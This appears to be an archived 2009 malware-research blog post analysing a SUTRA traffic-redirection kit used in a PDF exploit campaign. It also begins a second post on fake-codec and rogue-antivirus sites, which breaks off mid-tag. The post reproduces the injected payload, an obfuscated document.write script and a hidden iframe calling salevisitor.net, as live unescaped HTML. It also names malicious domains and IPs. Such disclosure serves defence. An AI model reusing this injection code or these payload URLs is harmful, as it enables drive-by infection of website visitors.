font-family:Tahoma, Geneva, sans-serif"><table width="567" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="567" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - PDF Malware campaign</span><br /></p><br /><table width="528" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="528"><p>Previously in March, Abode has released some security updates addressed to <br />vulnerabilities and exploits using Adobe Reader. Some links can be found below<br /><br />McAfee Avert Labs: <a href="http://www.avertlabs.com/research/blog/index.php/2009/02/19/new-backdoor-attacks-using-pdf-documents/" target="_blank">New Backdoor Attacks using PDF Documents</a><br />Trend Micro Malware Blog: <a href="http://blog.trendmicro.com/portable-document-format-or-portable-malware-format/" target="_blank">Portable Document Format or Portable Malware Format?</a><br />SANS Internet Storm Center: <a href="http://isc.sans.org/diary.html?storyid=5902" target="_blank">Adobe/Acrobat 0-day in the wild?</a> <br /><br />Adobe Security Bulletin: <a href="http://www.adobe.com/support/security/advisories/apsa09-01.html" target="_blank">Buffer overflow issue</a><br /><br />Here is a complete example with sreenshots, data and analysis of a website <br />used in the PDF malware campaign and hosting a malicious application called SUTRA.<br /><br />The application also known as "Traffic Management System" is explained by <br />McAfee AvertLabs on this page: <a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/" target="_blank">Inside the malicious traffic</a><br /><br />This cybercrime toolkit is actively used to manage traffic from compromised <br />websites and redirects visitors to exploits code or other malicious URLs with <br />fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more. <br /><br />We have another example of a compromised website explained <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2189" target="_blank">here</a>. <br />Screenshot of SUTRA can be found.<br /><br />***<br /><br />Now let's take a look of another website used.<br /><br />The site is "salevisitor.net" 89.107.104.10 <br />[Do not enter this site unless you know what you are doing]<br /><br />The payload is located here
"salevisitor.net/in.cgi?6" [Unstable - file not found at this time]<br /><br />Just for your information, this is the structure of files/folders for SUTRA Traffic Manager
<br /></p><table width="426" height="891" border="0" cellpadding="0" cellspacing="0" ><tr><td width="156" height="13" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td height="13" width="270" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">files</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">install</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">memory</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">getos.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">c.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">center.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron.sh</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">panel.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">ub_fetcher</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin_forces.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type_new.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">crontab_wizard.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_user.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces_view.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">general_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">GeoIP.dat</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">geoip.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_options.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_vars.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">import.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">key</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">login.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">page.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pages_navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">profile.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register_done.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">search.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_bottom.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_header.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_daily.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">static_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">uptime_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">users.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">files:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cgi.pm</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">counter.gif</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">curl</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">default.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">gotourl.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">html:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">image files and javascript (gif, js)</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">install:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd4 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd5 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd6 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">linux // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr></table><p>The admin page has no password on this server so you can enter and see stats like:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArn76fu0bLrC93b_3cyLN98bfmS3RfRw4KrialeavhbLDdF_iNm-zkGCEPi02USUDFtblK7w0UBPwo-oYiw_d0O2_D4YMEuY4p7xQXa6UPiXNmBjMZJ9aQVcxeK6ZbpqyTyBmBx0XfgoK/s1600-h/inside-the-malicious-traffic1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 252px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArn76fu0bLrC93b_3cyLN98bfmS3RfRw4KrialeavhbLDdF_iNm-zkGCEPi02USUDFtblK7w0UBPwo-oYiw_d0O2_D4YMEuY4p7xQXa6UPiXNmBjMZJ9aQVcxeK6ZbpqyTyBmBx0XfgoK/s320/inside-the-malicious-traffic1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210743794634130" /></a><br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiljYoeRy5rip46Z_aD8ARJtRpEd50UQvZJecM_IOsSehgqX0tcTlsNhRSen6UdxLx7J4DipHXY_gWD8lvigYmAfL24qyBvBaekNlg0eUbjj0XmAsSeloXNgOO9mXLJzqkK3vmR3cZSvddc/s1600-h/inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 198px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiljYoeRy5rip46Z_aD8ARJtRpEd50UQvZJecM_IOsSehgqX0tcTlsNhRSen6UdxLx7J4DipHXY_gWD8lvigYmAfL24qyBvBaekNlg0eUbjj0XmAsSeloXNgOO9mXLJzqkK3vmR3cZSvddc/s320/inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210725183346962" /></a><br /><br />So now we know the IP, domain name, URLs used after redirection <br />but from were is coming the traffic? <br /><br />Let's take a look of another folder "/memory/"<br /><br />This folder has files like 1.access.log, 2.access.log, 5.access.log, <br />25.access.log, 70.access.log etc... <br /><br />Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. <a href="http://www.google.com/search?q=site:onlinedetect.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a> and <a href="http://www.google.com/search?q=site:0day33hours.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a><br /><br />2.access.log - The file contain the IP of visitors reaching infected <br />websites, some are in Czech Republic, Israel, Russia, Turkey etc. <br />The file also reveal the URL of some compromised websites <br />were the malicious obfuscated javascript code has been inserted. <br /></p><table width="324" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="320"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s1600-h/inside-the-malicious-traffic3.jpg"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi425lxhpwZDcUcu4Emk0oCaireGpIJtlE_SL3CpgMEevxTCF_mGzbavUkhebBM3aQs3nJil93XArnBZPdj6-x-0gGR9iwPjBe_01oHEcv0IXI6rjT-NMSZolkUrOgArJGZcdD_oOXJIgST/s1600-h/inside-the-malicious-traffic2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi425lxhpwZDcUcu4Emk0oCaireGpIJtlE_SL3CpgMEevxTCF_mGzbavUkhebBM3aQs3nJil93XArnBZPdj6-x-0gGR9iwPjBe_01oHEcv0IXI6rjT-NMSZolkUrOgArJGZcdD_oOXJIgST/s320/inside-the-malicious-traffic2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220101658169378" /><br />
</a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s1600-h/inside-the-malicious-traffic3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s320/inside-the-malicious-traffic3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220112647190210" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi425lxhpwZDcUcu4Emk0oCaireGpIJtlE_SL3CpgMEevxTCF_mGzbavUkhebBM3aQs3nJil93XArnBZPdj6-x-0gGR9iwPjBe_01oHEcv0IXI6rjT-NMSZolkUrOgArJGZcdD_oOXJIgST/s1600-h/inside-the-malicious-traffic2.jpg"></a></td></tr></table><br />Line 1: <br /><br />hxxp://www.met[BLOCKED]p.com.pl/meta...........<br /><a href="http://wepawet.iseclab.org/view.php?hash=3e9535674077816c195b2f5c4af62a35&t=1238245549&type=js" target="_blank">Javascript Analysis</a><br /><br />Line 23: 77.250.xx.xx<br /><br />http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....<br /><a href="http://wepawet.iseclab.org/view.php?hash=3d3e5c04a9caad44c4fd3962a140b796&t=1238243179&type=js" target="_blank">Javascript Analysis<br /></a><br />hxxp://www.gif[BLOCKED]za.pl/gify/baj...<br /><a href="http://wepawet.iseclab.org/view.php?hash=7e4046d551c230b04c501dc9aa443c5e&t=1238238377&type=js" target="_blank">Javascript Analysis</a><br /><br />The analysing confirm that all these site has the same code added<br /><br /><table width="231" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="827"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s1600-h/inside-the-malicious-traffic3.jpg"></a> <script><br /> if (!myia){ document.write(unescape(' <br /> %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63<br /> %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f<br /> %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e<br /> %65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%<br /> 4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%<br /> 68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%<br /> 32%38%29%2b%27%37%30%65%33%66%35%31%63%35%<br /> 27%20%77%69%64%74%68%3d%35%32%20%68%65%69%<br /> 67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%<br /> 27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%<br /> 27%3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true; </script> <br /></td></tr><tr><td> </td></tr><tr><td><iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+<br /> Math.round(Math.random()*21528)+'70e3f51c5' <br /> width=52 height=414 style='display: none'></iframe></td></tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=ce800e9f77d5e2d6e1446872badc869e&t=1235442045" target="_blank">Analysis report for hxxp://salevisitor.net/in.cgi?2</a><br /><br />The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352<br />which then load this executable --> <a href="http://www.virustotal.com/analisis/719a9978d900f67637d8fb2ef26e3291" target="_blank">VirusTotal Report</a><br /><br />******************
<br /><br /><p> Some other related link:<br /><br /><a href="http://www.honeynet.cz/wm/wm?id=0d7bb5dbba468351f3f31f08e2" target="_blank">Honeynet Malware Detail</a><br />Analysis of hxxp://eternal.alfamoon.com <a href="http://wepawet.iseclab.org/view.php?hash=7b4db35d032c390ff182be81d0d10e4c&t=1238244179&type=js" target="_blank">here</a><br /> <br /> <a href="http://www.myspace.com/154634620" target="_blank">MySpace Profile Attacked</a> (screenshot below)<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4VUsnpf24ydZymr8RGEZ7wijU9-KkRwE-9Q6w4Xhm-BnhGXkq8s4MpjSIki5YxmMuIYOxDDcYRT-fha5Ut-PBx6j3pA0B1fHZ0dqO5gJWYIojgljQt5c6Cj8HBY4JbOzj3ORMGamhqQVR/s1600-h/MySpaceAttack-inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4VUsnpf24ydZymr8RGEZ7wijU9-KkRwE-9Q6w4Xhm-BnhGXkq8s4MpjSIki5YxmMuIYOxDDcYRT-fha5Ut-PBx6j3pA0B1fHZ0dqO5gJWYIojgljQt5c6Cj8HBY4JbOzj3ORMGamhqQVR/s320/MySpaceAttack-inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318218293911603474" /></a><br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-35710265135805514202009-03-28T17:20:00.000-07:002009-03-28T19:16:14.834-07:00loyaldown-loyaltube Fake Codec and RogueAV<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1802" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus</span><br /><br />loyaldown09.com, loyaltube10.com are site that distribute <b>fake codec</b>. <br />We also have on this network sites which host rogue application like<br />XP-Police-Antivirus and Win-PC-Defender<br /><br />Fake codec and fake scanner page screenshot<br /><br />loyaltube10.com [213.163.65.10]<br /> loyaldown09.com [213.163.65.9] <br /><br />hxxp://loyaltube10.com/scan/?id=..<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /> <br />hxxp://loyaltube10.com/tube/?id=...&title=adult+movie<br /><br /><a 